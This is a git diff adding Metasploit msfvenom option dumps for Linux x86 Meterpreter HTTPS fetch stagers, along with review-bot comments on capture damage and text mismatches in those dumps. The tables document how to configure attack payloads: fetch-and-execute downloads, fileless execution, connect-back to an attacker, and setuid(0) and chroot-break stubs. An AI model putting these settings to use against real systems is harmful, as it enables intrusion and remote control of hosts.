+FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. 
+ Listen for a connection with UUID Support (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID 
value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
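Review bot: the AppendExit row in the options table above (the bind_tcp_uuid dump that ends here) carries the description "Prepend a stub that will break out of a chroot (includes setreuid to root)", which is word for word the PrependChrootBreak description two rows later; an option named AppendExit cannot be a chroot-break prepend, so either the capture is mis-aligned or the option text upstream is wrong, and it should be checked before the file is committed as reference output. The same mismatch is present in every payload dump in this patch. Two smaller text problems in the same table: "PingbackRetries 0 yes How many additional successful pingbacks" stops mid-sentence, and "SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure" reads as a typo for "Number of seconds to try reconnecting for". If these files are generated, fixing the generator's source text is preferable to hand-editing the dumps.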
diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-find_tag.txt b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-find_tag.txt new file mode 100644 index 0000000..29deb88 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-find_tag.txt 
@@ -0,0 +1,106 @@ + + Name: HTTPS Fetch, Find Tag Stager + Module: payload/cmd/linux/https/x86/meterpreter/find_tag + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 104 + +Evasion options for payload/cmd/linux/https/x86/meterpreter/find_tag: +========================= + +@rapid7.com> + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME pCMqNuEK no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Use an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + 
MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number 
of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + TAG ywM2 yes The four byte tag to signify the connection. + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-reverse_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-reverse_ipv6_tcp.txt new file mode 100644 index 0000000..bb1a595 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-reverse_ipv6_tcp.txt 
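Review bot: in cmd-linux-https-x86-meterpreter-find_tag.txt (the hunk just above) the committed defaults "FETCH_FILENAME pCMqNuEK" and "TAG ywM2" are per-run random values, so every regeneration of these dumps will produce a spurious diff in exactly these rows; either mask them in the generator (for example replace the value with a fixed placeholder) or state in the repo that the defaults are not stable. Note also that FETCH_SRVHOST is "Required yes" here but "Required no" in the reverse_* dumps that follow; that is consistent with find_tag having no LHOST to fall back on, but a one-line remark in the README would stop readers filing it as an inconsistency. The header of this file is also damaged: the "Evasion options" section is empty and the author list begins with the fragment "@rapid7.com>", so the author heading and at least one name were lost when the output was captured.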
@@ -0,0 +1,115 @@ + + Name: HTTPS Fetch, Reverse TCP Stager (IPv6) + Module: payload/cmd/linux/https/x86/meterpreter/reverse_ipv6_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 107 + +Evasion options for payload/cmd/linux/https/x86/meterpreter/reverse_ipv6_tcp: +========================= + +7.com> + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no IPv6 scope ID, for link-local addresses + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME gmHQDyrhu no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. 
+ Connect back to attacker over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID 
value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-reverse_nonx_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-reverse_nonx_tcp.txt new file mode 100644 index 0000000..2522f88 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-reverse_nonx_tcp.txt 
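Review bot: in cmd-linux-https-x86-meterpreter-reverse_ipv6_tcp.txt (the hunk just above) the author block is truncated to "7.com>" followed by "kris katterjohn", the same capture damage seen as "@rapid7.com>" in the find_tag dump and "pid7.com>" in the reverse_tcp dump later in this patch; either re-capture with the full module info so the author heading and e-mail addresses are intact, or strip the author block from all dumps rather than committing half a line. The "Platform: Linux, Linux" line also repeats the platform, which suggests the capture concatenates the stager's and the stage's platform lists; if that is intended, say so in the repo, otherwise de-duplicate it in the generator. The "ReverseAllowProxy ... Connect back will NOT go through proxy but directly to LHOST" description is split across two captured lines here; that is harmless in a text dump but will break any script that parses these files row by row.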
@@ -0,0 +1,113 @@ + + Name: HTTPS Fetch, Reverse TCP Stager + Module: payload/cmd/linux/https/x86/meterpreter/reverse_nonx_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: +Evasion options for payload/cmd/linux/https/x86/meterpreter/reverse_nonx_tcp: +========================= + + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME eIIxUvaWthpy no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. 
+ Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID 
value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..681240b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-reverse_tcp.txt 
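Review bot: in cmd-linux-https-x86-meterpreter-reverse_nonx_tcp.txt (the hunk just above) the header contains an empty "Rank:" line that the find_tag and reverse_ipv6_tcp dumps do not have, so the files in this patch were not produced from one template and any tooling that diffs them against each other will see header noise; pick one layout and normalise. The FETCH_FILELESS description "Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)" is missing a closing parenthesis after "≥3.8"; the text comes from the tool, but if the generator post-processes option text at all this is the place to fix it.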
@@ -0,0 +1,116 @@ + + Name: HTTPS Fetch, Reverse TCP Stager + Module: payload/cmd/linux/https/x86/meterpreter/reverse_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 107 + +Evasion options for payload/cmd/linux/https/x86/meterpreter/reverse_tcp: +========================= + +pid7.com> + skape + egypt + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME cBFQtUZIp no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. 
+ Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID 
value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-reverse_tcp_uuid.txt 